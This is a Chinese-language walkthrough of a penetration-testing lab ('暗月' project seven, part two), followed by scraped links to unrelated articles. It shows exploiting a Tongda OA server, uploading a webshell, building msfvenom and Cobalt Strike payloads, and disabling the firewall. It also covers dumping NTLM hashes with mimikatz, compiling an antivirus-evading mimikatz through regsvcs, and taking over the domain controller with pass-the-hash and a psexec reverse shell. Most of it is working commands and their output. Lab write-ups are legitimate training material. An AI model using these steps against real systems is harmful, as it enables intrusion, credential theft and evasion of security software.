暗月渗透实战靶场-项目七(下)
00x6-踏进内网
上面我们已经拿到了外网机器的adminstrstor的用户权限
对内网进行信息搜集
密码获取
hashdump
logonpasswords
上面我们已经知道这个目标机是开启了3389端口的、
连接3389
小插曲
如果连接Windows server 2016出现这个报错
解决
连接
成功
任务
清除痕迹、关闭安全狗、Windows Defeder在前面我们已经完全的关闭了
跨网段信息搜集
查看arp信息
arp -a
内网扫描
内网IP扫描
这里使用的是目标机1的隧道进行扫描的、不建议使用在本机代理使用nmap、太慢了
run arp_scanner -r 10.10.1.0/24
确定只有两个ip10.10.1.130与本机的10.10.1.131
端口扫描
proxychains4 sudo masscan -p 1-65535 10.10.1.130 --rate=500
访问80端口
通达OA
00x7-进入内网发现域控
拿下目标机2
上面我们发现的通达OA
直接使用工具
直接打通
上传冰蝎马
上传
连接
查看权限
查看进程
居然有360杀毒
查看进行列表
taslist
发现360杀毒、应该是由360全家桶的、但是一路上都没有对我们的webshell有查杀
查看网卡信息、端口信息
ipconfig /allnetstat -ano
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vMYkZ6G1-1643557231577)(C:/Users/joker/AppData/Roaming/Typora/typora-user-images/image-20220127220848487.png)]
这里445端口是开放的、如果可以利用的话、我们可以避免麻烦直接使用正向代理进行连接、这样就避免做二次代理的麻烦了。
ip
两张网卡、这次应该就是在域控了
关闭Windows防火墙
netsh advfirewall set allprofiles state off
尝试访问445端口
proxychains4 sudo nmap -sT -Pn 10.10.1.130 -p 445
制作正向连接代理
制作攻击载荷
使用msfvenom生成攻击载荷
msfvenom -p windows/meterpreter/bind_tcp LPORT=6065 -e x86/shikata_ga_nai -i 40 -f c -o payload_bind40.c
使用掩目制作
上传
并没有被查杀、难道360的版本是比较老的?
制作CS木马
那就在上传有一个cs的木马
无论怎么刷新都不会消失、尝试运行
设置监听并上线
MSF
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set lhost 10.10.1.130 #正向连接的时候直接是设置目标机器的ip即可
set lport 6065
运行攻击载荷
上线
CS
设置监听器
执行木马
上线
我们使用CS不但上线了OA机器的system的会话、而且居然还能成功的将会话转入到ATTACK\Aadminiatrator的会话
00x8-发现并进攻域控
信息收集
密码收集
密码收集
hashdump
域控
creds_all
发现域控
密码破解
OA
密码暂时不管了
继续域控
Authentication Id : 0 ; 383765 (00000000:0005db15)
Session : Interactive from 1
User Name : Administrator
Domain : OA
Logon Server : OA
Logon Time : 2022/1/27 22:14:41
SID : S-1-5-21-3252981389-920624007-1327000051-500msv : [00010000] CredentialKeys* NTLM : 357bec0ee1f524c62ba536fcd3f74472* SHA1 : 43780ba4a0371ece954584ae098bcd820554bd54[00000003] Primary* Username : Administrator* Domain : OA* NTLM : 357bec0ee1f524c62ba536fcd3f74472* SHA1 : 43780ba4a0371ece954584ae098bcd820554bd54Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : OA$
Domain : ATTACK
Logon Server : (null)
Logon Time : 2022/1/27 22:14:07
SID : S-1-5-18msv : Authentication Id : 0 ; 89278 (00000000:00015cbe)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2022/1/27 22:14:08
SID : S-1-5-90-1msv : [00000003] Primary* Username : OA$* Domain : ATTACK* NTLM : 65288d11ef4984198c4fe020137cd948* SHA1 : 5fbfecfb312235fe23a7be6c591e1e9c6ddbc3ffAuthentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : OA$
Domain : ATTACK
Logon Server : (null)
Logon Time : 2022/1/27 22:14:07
SID : S-1-5-20msv : [00000003] Primary* Username : OA$* Domain : ATTACK* NTLM : 65288d11ef4984198c4fe020137cd948* SHA1 : 5fbfecfb312235fe23a7be6c591e1e9c6ddbc3ffAuthentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2022/1/27 22:14:08
SID : S-1-5-19msv : Authentication Id : 0 ; 50742 (00000000:0000c636)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2022/1/27 22:14:07
SID : msv : [00000003] Primary* Username : OA$* Domain : ATTACK* NTLM : 65288d11ef4984198c4fe020137cd948* SHA1 : 5fbfecfb312235fe23a7be6c591e1e9c6ddbc3ff
主机信息
定位域控
net time假如是在域控的主机、就会返回域控的同步时间run post/windows/gather/enum_domain
域控
dc.attack.local
查看域控的用户登录情况
使用CS
beacon> net domain #域控的域名
[*] Tasked beacon to run net domain
[+] host called home, sent: 231 bytes
[+] received output:
attack.localbeacon> net computers #域控登录的主机信息(主机名、ip)
[*] Tasked beacon to run net computers
[+] host called home, sent: 87654 bytes
[+] received output:
Computers:Server Name IP Address ----------- ---------- DC 10.10.10.165OA 10.10.1.130beacon> net domain_controllers #域控的主机名以及ip信息
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 87663 bytes
[+] received output:
Domain Controllers:Server Name IP Address ----------- ---------- DC 10.10.10.165beacon> net domain_trusts #域控信息、用户名
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 87658 bytes
[+] received output:
List of domain trusts:0: ATTACK attack.local (Forest tree root) (Primary Domain) (Native)beacon> net logons #所有登录域的用户信息
[*] Tasked beacon to run net logons on localhost
[+] host called home, sent: 87651 bytes
[+] received output:
Logged on users at \\localhost:OA\Administrator
ATTACK\OA$
ATTACK\OA$beacon> net sessions
[*] Tasked beacon to run net sessions on localhost
[+] host called home, sent: 87653 bytes
[+] received output:
Sessions for \\localhost:Computer User name Active (s) Idle (s)-------- --------- ---------- --------\\[::1] OA$ 5 0beacon> net share
[*] Tasked beacon to run net share on localhost
[+] host called home, sent: 87650 bytes
[+] received output:
Shares at \\localhost:Share name Comment---------- -------ADMIN$ 远程管理C$ 默认共享IPC$ 远程 IPC
使用MSF
meterpreter > run post/windows/gather/enum_logged_on_users #所有登陆域的用户信息[*] Running against session 4Current Logged Users
====================SID User--- ----S-1-5-18 NT AUTHORITY\SYSTEMS-1-5-21-3252981389-920624007-1327000051-500 OA\Administrator[+] Results saved in: /home/kali/.msf4/loot/20220130040913_moonlab1.114_10.10.1.130_host.users.activ_385207.txtRecently Logged Users
=====================SID Profile Path--- ------------S-1-5-18 %systemroot%\system32\config\systemprofileS-1-5-19 C:\Windows\ServiceProfiles\LocalServiceS-1-5-20 C:\Windows\ServiceProfiles\NetworkServiceS-1-5-21-3252981389-920624007-1327000051-500 C:\Users\AdministratorS-1-5-21-4052809752-717748265-227546684-1103 C:\Users\oaS-1-5-21-4052809752-717748265-227546684-500 C:\Users\administrator.ATTACKmeterpreter > run post/windows/gather/enum_ad_computers #域内用户的主机信息Domain Computers
================dNSHostName distinguishedName description operatingSystem operatingSystemServicePack----------- ----------------- ----------- --------------- --------------------------dc.attack.local CN=DC,OU=Domain Controllers,DC=attack,DC=local Windows Server 2016 Standardoa.attack.local CN=OA,CN=Computers,DC=attack,DC=local Windows Server 2012 R2 Standardmeterpreter > run post/windows/gather/enum_domain #域控的名字和dc所在的ip[+] FOUND Domain: attack
[+] FOUND Domain Controller: dc (IP: 10.10.10.165)
使用shell
C:\myoa\nginx>net user /domain #查看域内用户
net user /domain
The request will be processed at a domain controller for domain attack.local.User accounts for \\dc.attack.local-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
krbtgt oa
The command completed with one or more errors.C:\myoa\nginx>net group /domain #查看域控所在的组
net group /domain
The request will be processed at a domain controller for domain attack.local.Group Accounts for \\dc.attack.local-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.C:\myoa\nginx>net localgroup administrators /domain #查看登录域内的administrator用户
net localgroup administrators /domain
The request will be processed at a domain controller for domain attack.local.Alias name administrators
Comment ▒▒▒▒Ա▒Լ▒▒▒▒/▒▒▒в▒▒▒▒▒▒Ƶ▒▒▒ȫ▒▒▒▒ȨMembers-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.C:\myoa\nginx>net group "domain admins" /domain #查看域内的admini用户
net group "domain admins" /domain
The request will be processed at a domain controller for domain attack.local.Group name Domain Admins
Comment ָ▒▒▒▒▒▒▒▒▒ԱMembers-------------------------------------------------------------------------------
Administrator
The command completed successfully.C:\myoa\nginx>net group "domain controllers" /domain
net group "domain controllers" /domain
The request will be processed at a domain controller for domain attack.local.Group name Domain Controllers
Comment ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒Members-------------------------------------------------------------------------------
DC$
The command completed successfully.
查看域控管理员登录
我们能知道现在目标机器是在attack.local的域控中的
查看用户进程
拿到域控管理员
我们在OA主机发现是由域控的aministrator用户在线的
使用命令窃取进程
steal_token 3628
尝试建立administrator的用户shell
无法建立会话
尝试访问dc的c盘
dir \\dc\c$
无法访问
这样的administrator是没有意义的、我们暂时先取消刚刚窃取的administrato的shell
rev2self
CS建立shell
上面我们使用msf是无法创建shell窗口的、这里使用cs尝试
是可以建立shell的
尝试访问文件
可以放问attack域控的文件的
beacon> shell dir \\dc\c$
[*] Tasked beacon to run: dir \\dc\c$
[+] host called home, sent: 42 bytes
[+] received output:驱动器 \\dc\c$ 中的卷没有标签。卷的序列号是 FEFA-8711\\dc\c$ 的目录2016/07/16 21:23 <DIR> PerfLogs
2020/07/14 14:12 <DIR> Program Files
2016/07/16 21:23 <DIR> Program Files (x86)
2020/07/14 14:07 <DIR> Users
2020/08/09 09:35 <DIR> Windows0 个文件 0 字节5 个目录 52,490,985,472 可用字节beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
attack\administrator
直接就拿到下了域控、没意思、这不是我们想要的、、、、、、、、
下面继续使用MSF进行攻击、因为又的时候CS的免杀攻击木马是不好做出来的、所以还是尽量的模仿真是的攻击环境比较好
访问域控信息
添加路由
在10.10.1.130的机器上在添加一条10.10.10.0/24的静态路由、以便我们访问域控的10.10.10.的机器
run autoroute -s 10.10.10.0/24
run autoroute -p
访问域控主机
proxychains4 ping 10.10.10.165
主机扫描
端口扫描
proxychains4 sudo masscan -p 1-65535 10.10.10.165 --rate=500
或者使用nmap进行常用端口的探测扫描
proxychains nmap -sT -Pn 10.10.1.130 -p 80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984 ,6379,7001,7002,9200,9300,11211,27017,27018 ,50000,50070,50030,21,22,23,2601,3389 --open
3389端口是开放的
获取域用户的PID SID的NTML
管理员
这个获取是使用mimikatz工具的命令的、(只有域管理员才能拿到)
krbtgt
登录域控管理员
pth登录域管理
参考学习:
https://www.anquanke.com/post/id/152956
https://www.cnblogs.com/feizianquan/p/11764344.html
https://yoga7xm.top/2019/04/12/IPentest-domain3/
https://www.geekby.site/2019/04/pthpass-the-hash-%E6%94%BB%E5%87%BB/ #这个方法多
使用cs
https://blog.csdn.net/lhh134/article/details/104475026
https://www.anquanke.com/post/id/235251#h2-17
在CS的环境下
执行命令
mimikatz sekurlsa::pth /user:administrator /domain:attack.local /ntlm:c7078b8300f0eacbffe68981cc733ee4 /run:"cmd -w hidden"
窃取进程
steal_token 3584shell dir \\dc\c$
成功访问attack域控的shell
过程
beacon> shell dir \\dc\c$
[*] Tasked beacon to run: dir \\dc\c$
[+] host called home, sent: 66 bytes
[+] received output:
拒绝访问。beacon> mimikatz sekurlsa::pth /user:administrator /domain:attack.local /ntlm:c7078b8300f0eacbffe68981cc733ee4 /run:"cmd -w hidden"
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:administrator /domain:attack.local /ntlm:c7078b8300f0eacbffe68981cc733ee4 /run:"cmd -w hidden" command
[+] host called home, sent: 787055 bytes
[+] received output:
user : administrator
domain : attack.local
program : cmd -w hidden
impers. : no
NTLM : c7078b8300f0eacbffe68981cc733ee4| PID 3584| TID 4368| LSA Process is now R/W| LUID 0 ; 31223186 (00000000:01dc6d92)\_ msv1_0 - data copy @ 0000005B4E0587C0 : OK !\_ kerberos - data copy @ 0000005B4E09AA78\_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK\_ rc4_hmac_old OK\_ rc4_md4 OK\_ rc4_hmac_nt_exp OK\_ rc4_hmac_old_exp OK\_ *Password replace @ 0000005B4E0910A8 (16) -> nullbeacon> steal_token 3584
[*] Tasked beacon to steal token from PID 3584
[+] host called home, sent: 12 bytes
[+] Impersonated OA\Administrator
beacon> shell dir \\dc\c$
[*] Tasked beacon to run: dir \\dc\c$
[+] host called home, sent: 42 bytes
[+] received output:驱动器 \\dc\c$ 中的卷没有标签。卷的序列号是 FEFA-8711\\dc\c$ 的目录2016/07/16 21:23 <DIR> PerfLogs
2020/07/14 14:12 <DIR> Program Files
2016/07/16 21:23 <DIR> Program Files (x86)
2020/07/14 14:07 <DIR> Users
2020/08/09 09:35 <DIR> Windows0 个文件 0 字节5 个目录 52,490,973,184 可用字节beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
oa\administrator
使用mimikatz
上传mimikatz
由于有360的存在这里需要进行免杀处理
mimikatz-csharp
https://github.com/ssssanr/Mimikatz-Csharp
mimikatz源码
https://github.com/gentilkiwi/mimikatz
三步即可
命令
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte将生成的key文件“key.snk”复制到:C:\Windows\Microsoft.NET\Framework\v4.0.30319 然后将下载的“katz.cs”也复制到:C:\Windows\Microsoft.NET\Framework\v4.0.30319运行csc.exe执行命令
csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:regsvcs.dll /keyfile:key.snk /unsafe katz.cs然后就会输出文件“regsvcs.dll”建议是在windows server 2012这样的老机器上运行的一般win10运行会出错
如果运行的时候错误说缺少“System.IO.Compression.dll”文件、我们只需要去下载即可运行regsvcs.dllregsvcs.exe regsvcs.dll #即可
将生成的dll文件上传至10.10.1.130的机器上
执行
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
x64C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe regsvcs.dll #用这个就行
[OR]C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dllC:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dllC:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dllC:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U regsvcs.dll执行完毕后就会在本此shell会话中生成mimikatz的会话
结果
执行命令进行pth
sekurlsa::pth /user:administrator /domain:attack.local /ntlm:c7078b8300f0eacbffe68981cc733ee4 /run:"cmd -w hidden"
这里是没有成功的、pth并没有完整的执行的、只有这样才是正确执行的
我们也可以尝试迁移进程
在MSF环境下使用windows/smb/psexec
条件:
①开启445端口SMB服务(默认开启)
②开启admin$共享
设置监听
use exploit/windows/smb/psexec
set RHOSTS 10.10.10.165
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.1.130
set SMBUSER Administrator
set SMBPASS d747b7b8037e8669c771f6a9d803419b:86c01dc8633fc387a503b05615f8afb1
set SMBDomain attack.local
exploit
结果
写在最后
欢迎大家加入星球一起学习、里面有各种红队资源、工具、各种小技巧啊!
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- [云炬ThinkPython阅读笔记]3.2 数学函数
...
2024/4/13 20:50:19 - Python 高等数学应用 求导数的三种方式
Python 高等数学应用 求导数的三种方式 方式一 使用SymPy的diff 函数, 可以得到函数的导数表达式,给出数学表达式里的数学符号描述符 本例使用了此方法 方式二 使用spicy.misc模块下的derivative函数 举例子: 求函数f(x)在x0处的导数 方式三 使用NumPy里的poly1d构造函数…...
2024/5/7 15:13:09 - 继承 的学习
子类继承父类 格式:class 子类 extends 父类{} 特点: 1.一个子类只有一个父类(亲爹) 2.java语言支持多层继承(一个儿子可以有一个亲爹,还可以有一个亲爷爷) 同一个包里面不能有同一个类 继承中成…...
2024/4/5 3:27:25 - APISIX源码解析-插件-客户端IP【real-ip】
real-ip 客户端IP插件。 关键属性 源码解析 real-ip 插件用于动态改变传递到 APISIX 的客户端的 IP 和端口。 local function get_addr(conf, ctx)if conf.source "http_x_forwarded_for" then-- use the last address from X-Forwarded-For header-- 用最后一个…...
2024/5/8 6:18:24 - 小程序第一天-目录结构及配置文件
在传统的web开发中所看到的目录结构和小程序中的目录结构是不一样的,比对如下 可以看出,微信小程序比传统web开发多了一层配置.json 微信小程序具体目录结构 其中最后两项需要注意一下! 1.project.config.json文件的配置项与我们微信开发者工…...
2024/5/7 20:25:43 - C++中的复制构造函数
Copy Constructor in C What is a copy constructor? (什么是复制构造函数?) A copy constructor is a member function that initializes an object using another object of the same class. A copy constructor has the following gene…...
2024/5/8 0:05:42 - leetcode之字符串二: 拼写单词
原题: 力扣https://leetcode-cn.com/problems/find-words-that-can-be-formed-by-characters/ 一、题目要求 给你一份『词汇表』(字符串数组) words 和一张『字母表』(字符串) chars。 假如你可以用 chars 中的『字母』&#…...
2024/4/13 20:50:14 - java中强制退出jvm的代码
System.exit(0); 也就是说运行这句代码之后将结束java程序。...
2024/4/17 15:01:34 - Pytorch中的torch.cat()函数
参考链接 字面理解:torch.cat是将两个张量(tensor)拼接在一起,cat是concatnate的意思,即拼接,联系在一起。 C torch.cat( (A,B),0 ) #按维数0拼接(竖着拼)C torch.cat( (A,B),1 …...
2024/5/3 19:59:51 - R 绘制柱形偏差图
于是今天分享一下绘制代码给大家,下面是小伙伴发的图: 这幅图绘制的关键点有两个: 1、排序 2、在图里添加文本标签,并为不同颜色 数据的话大家根据类似格式整理成就可以了。 首先加载 R 包,读取测试数据: # 加载R包 library(ggplot2) library(ggprism) library(tidyver…...
2024/4/7 19:25:01 - 使用vue脚手架初始化项目的命令是什么?
vue init 模板名 项目名...
2024/4/30 5:34:07 - 【Day1】ES5 (转为数字类型,字符串类型,布尔类型)
日期:1月30日夜 1.转为数字类型 具有可转性的数值才能进行 数据类型转换 简单数据类型包含: number string boolean null undefined 转换的方式: Number(待转的数据) parseInt(待转的数据) parseFloat(待转的数据) 案例:&…...
2024/5/5 11:18:18 - Naoqi机器人学习:
Nao编程基础: 在Nao中模块通过Broker通告它所提供的方法。 模块使用:from naoqi import ALProxy tts ALProxy("ALTextToSpeech", "机器人地址", 9559) tts.say("Hello, world!") 说明: ALProxy类用…...
2024/4/30 9:14:34 - Linux之kill命令
【Linux常用命令速查手册】关注【入门小站】,后台回复 「1001」 自取。 Linux中的kill命令用来终止指定的进程(terminate a process)的运行,是Linux下进程管理的常用命令。通常,终止一个前台进程可以使用CtrlC键&#…...
2024/4/29 10:51:06 - 浏览器内核、渲染引擎、x86与RAM架构等基本概念
什么是浏览器内核 负责对网页语法的解释(如HTML、JavaScript)并渲染显示网页。 浏览器内核又可以分成两部分:渲染引擎(layout engineer 或者 Rendering Engine)和 JS 引擎。最开始渲染引擎和 JS 引擎并没有区分的很明确,后来 JS…...
2024/5/3 1:55:00 - Python人脸识别项目-人脸识别-进行人脸识别
这是最后一步进行人脸识别操作 # -*- coding: utf-8 -* import cv2 import os# 加载训练数据集文件 recogizer cv2.face.LBPHFaceRecognizer_create() recogizer.read(train/trainer.yml) # 获取脸部特征数据文件 names [] warningtime 0def face_detect_demo(img):gray …...
2024/5/1 23:31:47 - 信息学奥赛一本通 1403:素数对 | OpenJudge NOI 1.12 10:素数对
【题目链接】 ybt 1403:素数对 OpenJudge NOI 1.12 10:素数对 【题目考点】 1. 质数 【解题思路】 枚举。 设较大数字为i,那么较小数字为i-2。 较小数字从2开始,那么i从4开始遍历,直到n。枚举每一个数对i和i-2,看…...
2024/4/13 20:50:45 - 什么是vue脚手架(vue-cli)?
Vue脚手架可以帮助我们快速的创建出来一个Vue项目。...
2024/4/17 21:58:41 - idea2018 升级到2020.3后gradle出现的抽风现象
前言公司的一个小gradle项目制作授权用的一年没动了,放假前做了个小调整,因我之前用的是idea2019 ,21年换成2020.3后陷入巨坑 问题1编码问题,中文编译不通过 idea的所有编码设为utf-8,清除idea缓存,关机,重…...
2024/4/13 20:50:50 - 力扣763 划分字母区间(个人感悟向)
说实话这个我现在还没看出来哪里贪心了,是看的题解。 一开始初始化hash的时候,就已经把每个字母出现的最大位置设置好了,那如何划分某个字母具体所属的位置呢? 13、14行就很妙,两行连在一起看。从测试用例可以看到大…...
2024/4/19 13:13:46
最新文章
- 微信公众号营销攻略,2024年微信引流商业最佳实践
确实,微信是中国市场上不可或缺的营销工具。下面是一些关于如何在微信上进行有效营销的最佳实践,以及如何通过微信公众号进行广告宣传,以提升品牌知名度并推动业务增长。 拥有一个微信公众号是进行微信营销的关键第一步。 通过公众号&#x…...
2024/5/8 6:31:04 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/5/7 10:36:02 - Oracle备份和还原的几种方式
1、使用数据泵方式 exp demo/demoorcl buffer1024 filed:\back.dmp fully demo:用户名、密码 buffer: 缓存大小 file: 具体的备份文件地址 full: 是否导出全部文件 ignore: 忽略错误,如果表已经存在,则也是覆盖 exp demo/de…...
2024/4/30 4:18:57 - audio_video_img图片音视频异步可视化加载
最近在做即时消息,消息类型除了文字还有音频、视频、图片展示,如果消息很多,在切换聊天框时,会有明显卡顿,后续做了懒加载,方案是只加载用户能看到的资源,看不到的先不加载; LazyAud…...
2024/5/8 2:36:28 - 【外汇早评】美通胀数据走低,美元调整
原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...
2024/5/8 6:01:22 - 【原油贵金属周评】原油多头拥挤,价格调整
原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...
2024/5/7 9:45:25 - 【外汇周评】靓丽非农不及疲软通胀影响
原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...
2024/5/4 23:54:56 - 【原油贵金属早评】库存继续增加,油价收跌
原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...
2024/5/7 14:25:14 - 【外汇早评】日本央行会议纪要不改日元强势
原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...
2024/5/4 23:54:56 - 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响
原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...
2024/5/4 23:55:05 - 【外汇早评】美欲与伊朗重谈协议
原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...
2024/5/4 23:54:56 - 【原油贵金属早评】波动率飙升,市场情绪动荡
原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...
2024/5/7 11:36:39 - 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试
原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...
2024/5/4 23:54:56 - 【原油贵金属早评】市场情绪继续恶化,黄金上破
原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...
2024/5/6 1:40:42 - 【外汇早评】美伊僵持,风险情绪继续升温
原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...
2024/5/4 23:54:56 - 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势
原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...
2024/5/4 23:55:17 - 氧生福地 玩美北湖(上)——为时光守候两千年
原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...
2024/5/7 9:26:26 - 氧生福地 玩美北湖(中)——永春梯田里的美与鲜
原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...
2024/5/4 23:54:56 - 氧生福地 玩美北湖(下)——奔跑吧骚年!
原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...
2024/5/4 23:55:06 - 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!
原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...
2024/5/5 8:13:33 - 「发现」铁皮石斛仙草之神奇功效用于医用面膜
